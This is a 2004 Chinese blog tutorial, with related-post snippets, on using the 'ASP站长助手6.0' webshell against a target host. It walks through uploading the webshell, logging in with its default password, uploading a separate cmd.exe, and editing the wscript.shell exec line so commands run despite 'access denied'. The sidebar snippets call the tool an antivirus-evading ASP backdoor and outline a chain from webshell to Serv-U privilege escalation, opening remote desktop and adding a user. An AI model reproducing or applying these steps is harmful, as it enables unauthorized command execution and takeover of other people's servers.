使用ASP站长助手6.0提升webshll中cmd权限图文教程

最新推荐文章于 2024-10-11 11:57:54 发布
原创 最新推荐文章于 2024-10-11 11:57:54 发布 · 3.1k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#asp #cmd #浏览器 #qq
本文介绍了ASP站长助手6.0的使用方法。先将dbm6.asp文件上传到目标,从浏览器打开并输入初始密码,点击命令行模块会显示“拒绝访问”。接着用文件上传模块上传CMD.exe,修改wdbm6.asp中调用CMD.exe的代码,重新上传覆盖原文件,再次点击命令行模块即可看到黑白画面。
黑色诱惑
1.将ASP站长助手6.0的dbm6.asp文件上传到目标。

2.从浏览器中打开上传的dbm6.asp,输入初始密码:gxgl.com


3.这个时候在ASP站长助手6.0点击命令行模块,显示"拒绝访问"


4.用ASP站长助手6.0的文件上传模块上传一个本地的CMD.exe,到你的目标主机。


5.用记事本打开修改你的wdbm6.asp找到调用CMD.exe的代码
原来的:
SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
修改成:
SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall
比如我这里上传到的目录是D:/cmd.exe那么就修改成:
SI=SI&server.createobject("wscript.shell").exec("D:/cmd.exe /c "&DefCmd).stdout.readall
保存后重新上传到目标主机覆盖原来的dbm6.asp。


6.这个时候在ASP站长助手6.0点击命令行模块,呵呵,看看到久违的黑白画面了吧~~~



 [这是昨天QQ上一位叫小学徒的朋友问我的问题,我今天就专门去下了一个来用,然后在这里告诉他使用的方法,水平有限,写得很简陋,不知道大家能看懂不]
                                                                                                                                                ileboy
                                                                                                                                           2004/11/4
navyforce
关注
基于ASP站长助手(超强推荐).zip
07-19
基于ASP站长助手(超强推荐).zip
ASP站长助手6.0
05-16
欢迎使用桂林老兵站出品的“ASP站长助手”,请注意你手中的版本是否为最新版。 为了安全,本工具的登录方式为手工输入地址:在文件名后加上?action=login 版本:6.0 更新:2004-11-8 22:58 大小:30.4 KB (31,201 字节) 功能: 文件管理模块: 文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ACCESS数据库建立/压缩/操作; 以及常见数据库(MSSQL,MYSQL,DSN)的操作,附有操作示例代码; 命令行执行模板: 执行命令行程序,并回显。可以用来压缩目录来下载; 服务器支持组件信息查看 强调:本版本去掉了相对路径连接方式,全部采用绝对路径; 文件操作和上传时要输的路径为文件的全路径:盘符:\目录\文件名.扩展名; 目录操作时要输的路径为目录的全路径:盘符:\目录; ACCESS文件数据库的路径为文件的全路径:盘符:\目录\文件名.扩展名,请看示例代码; 优点:做到了真正的图形化操作,文件和目录的显示会有相应的图标显示; 操作时所产生的文件名,SQL操作符等参数全部采用POST来提交,不会在IIS日志中有记录; 对OBJECT进行了变形处理。一般不会被杀毒软件查杀。 可以自定义CMDSHELL的执行程序路径。 配置: ApplicationName = "Asp站长助手6.0" '#####程序名称/标题 UserPass = "gxgl.com" '#####初始登录密码 ShowFileIco = True '#####是否显示图标,False为用文字图标 IcoPath = "http://www.GXGL.com/images/FileType/" '#####图标目录,不必修改 附加:Filetype.rar备用图标目录。如果你是用来管理自己的网站的话,那么这个目录放在自己的空间上比较好管理。 用法:将dbm6.asp上传到支持ASP的空间上即可。连接时要在文件名后面手工加上action=login才能登录 操作数据库时请先连接显示表名后再输入SQL命令,不然会出错的。 默认在浏览数据库内容时每个字段最多只显示五十个字节。 要想浏览超过五十个字节的字段。可以这么做。 当只显示一条数据时就会显示全部字节了。可以通过SQL语言来控制。 如想全部显示ID为972的行的content字段的内容,可以这么构造SQL语句: select [content] from [article] where id=972 说明:文件操作使用的是FSO组件,上传使用的是ADODB.STREAM。 --------------------------------------------------------------------------------------------- 下载:http://www.gxgl.com/soft/dbm6.rar 作者:桂林老兵 网站:http://www.gxgl.com http://www.gxgl.net Q Q: 442331 Email: net@gxgl.com
改变asp权限教程
caiguazheng4921的博客
04-19 165
asp.dll解析成system提升权限网络上传统的提升asp权限为系统的有两种:1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天我要谈的关于adsutil.vbs提升权限.2.用adsutil.vb...
ASP木马配合Serv-U提升权限图文教程
...::: X.U.S.T :::...
10-19 2639
第一步得到一个webshell,找到一个everone权限目录,把提升权限工具传上去,执行命令 第二步,连上去吧  第三步,当然有的机器有pcanywhere了,像这台 下载下来破解  第四步连上去看看,还是win2003  第五步开3389吧 第六步加个用户。  其实在pcanywhere里边也行 工具下载 http://pic.yt-e.com/
分享95个ASP其他类别源码,总有一款适合您
zdh13370188237的博客
04-08 315
分享95个ASP其他类别源码,总有一款适合您
全功能站长工具包基于ASP实现
weixin_30789053的博客
10-11 977
本文还有配套的精品资源,点击获取 简介:本源代码集合采用ASP技术开发,为网站管理员提供网站流量统计、SEO优化工具等实用工具。ASP是一种服务器端脚本环境,它使开发者能够创建动态网页。源码旨在模仿原始站长站,提供在线代码编辑器、域名查询等功能。用户可下载解压后部署于支持ASP的Web服务器上。本项目涉及ASP基本结构、脚本语言、服务器控件、数据库交互、错误处理、状态管理、...
ASP站长助手 v6.0
02-23
文件管理模块:文件浏览/下载/删除/编辑/复制/移动/新建/上传;目录新建/移动/删除/复制;数据库管理模板:ACCESS数据库建立/压缩/操作;以及常见数据库(MSSQL,MYSQL,DSN)的操作,附有操作示例代码;命令行执行模板:执行命令行程序,并回显。可以用来压缩目录来下载;服务器支持组件信息查看
桂林老兵ASP站长助手6.0
04-05
桂林老兵ASP站长助手6.0 一个小巧的asp后门,功能包括: 文件管理模板、文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ACCESS数据库建立/压缩/操作; 以及常见数据库(mssql,mysql,DSN)的操作,附有操作示例代码; 命令行执行模板: 执行命令行程序,并回显。可以用来压缩目录来下载;
asp 站长工具
04-03
asp服务器站长必备,兼容win2000,win7,win8,win2003等服务器
动鲨asp站长助手
12-16
动鲨asp站长助手免杀版本 解决webshell运行时的拒绝访问 无权限等。 功能强大
在IIS中ASP.NET调用cmd程序权限不足
weixin_30262255的博客
04-12 770
问题 在本地代码中调用cmd 显示的路径为C:\Users\用户名> 而在服务器中调用cmd 显示的路径为C:\Windows\system32\inetsrv > 原因 服务器中调用的不是系统的cmd.exe 而是调用C:\Windows\system32\inetsrv 中的appcmd.exe  该工具来配置和查询 Web 服务器上的对象,并以文本或 XML 格式返回输出...
桂林老兵站ASP木马
ctangqh的专栏
09-07 6611
########版权所有 - 桂林老兵站www.gxgl.comServer.ScriptTimeout=50000Response.Buffer = TrueOn Error Resume NextApplicationName = "Asp站长助手6.0"                         #####程序名称/标题UserPass        = "gxgl.com"   
ASP.NET调用cmd命令提示符拒绝访问解决方案
数据库天地
08-14 420
最近做关于Windows Server POP3服务器的小项目,翻遍网络,也没能找到接口。 值得庆幸的是最终发现了一个控制台接口winpop.exe,也就是用cmd命令提示符与POP3服务器交互。 这样实属无奈之举,用cmd命令效率低不说,而且获取、分析返回信息相当麻烦。然而这还不算什么,最主要的是:B/S模式下,网页程序有权限调用cmd吗? 这里调用cmd,当然不是调用客户机器上的...
CentOs7网卡配置文件修改无效
最新发布
06-28
代码转载自:https://pan.quark.cn/s/8ce4326d996e 对于在 CentOS 7 系统中修改网卡配置文件后无法使设置生效的情况,经过实践验证,可以通过使用 nmcli 命令来进行调整。完成修改之后,需要重新启动虚拟机以使更改生效,这样操作流程即告完成。如果设置仍然无法生效,则表明虚拟机在启动过程中所获取的 IP 地址配置并非针对 eth0,此时可以对其它网卡的配置文件进行修改或将其移除。在 CentOS 7 系统中,网络配置的管理机制与早期版本存在差异,主要体现为采用了 Network Manager 服务来负责网络接口的管理。在某些情形下,尽管修改了 `/etc/sysconfig/network-scripts` 目录下的 `ifcfg-eth0` 文件,但网络配置却未能即时生效。此类问题的发生通常源于 CentOS 7 采用了不同于以往的配置读取方法。接下来将具体阐述如何借助 nmcli 命令来处理这一挑战。 以 root 用户身份登录系统并打开终端界面。nmcli 是 Network Manager 提供的命令行界面工具,它支持在命令行环境下执行网络连接的建立、编辑、查询及管理任务。针对修改 eth0 网卡配置的需求,可以遵循以下步骤进行操作: 1. 导航至 `/etc/sysconfig/network-scripts` 目录: ``` cd /etc/sysconfig/network-scripts ``` 2. 检查该目录内是否存在 `ifcfg-eth0.bak` 文件,该备份文件可能是先前调整配置时遗留下来的,若存在可能造成冲突。若发现该文件,可以选择将其删除: ``` [root@localhost netw...
网络管理教程入门至精通软件.txt
06-28
代码转载自:https://pan.quark.cn/s/46fd08fb879c 网管教程 从入门到精通软件篇 ★一。★详尽的xp修复控制台指令及其应用!!! 放入xp(2000)的光盘,安装时选择R,执行修复! Windows XP(涵盖 Windows 2000)的控制台指令是在系统遭遇某些意外状况时的一种极具效用的诊断、检测以及恢复系统功能的工具。笔者确实一直期望能够将这方面的指令进行归纳,此次由老范辛苦整理了这份极具价值的秘籍。 Bootcfg bootcfg 命令用于启动配置与故障恢复(对大多数计算机而言,即 boot.ini 文件)。 带有特定参数的 bootcfg 命令仅在运用故障恢复控制台时方可使用。能够在命令行界面下运用带有不同参数的 bootcfg 命令。 用法: bootcfg /default 设定默认引导选项。 bootcfg /add 向引导清单中增添 Windows 安装。 bootcfg /rebuild 重复整个 Windows 安装流程并让用户选择需添加的项目。 注意:运用 bootcfg /rebuild 之前,应先借助 bootcfg /copy 命令备份 boot.ini 文件。 bootcfg /scan 探查用于 Windows 安装的全部磁盘并展示结果。 注意:这些结果被静态存储,并用于当前会话。若在当前会话期间磁盘配置发生变动,为获取更新的探查结果,必须先重启计算机,然后再次探查磁盘。 bootcfg /list 列示引导清单中已有的项目。 bootcfg /disableredirect 在启动引导程序中禁用重定向。 bootcfg /redirect [ PortBaudRrate] |[ useBio...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值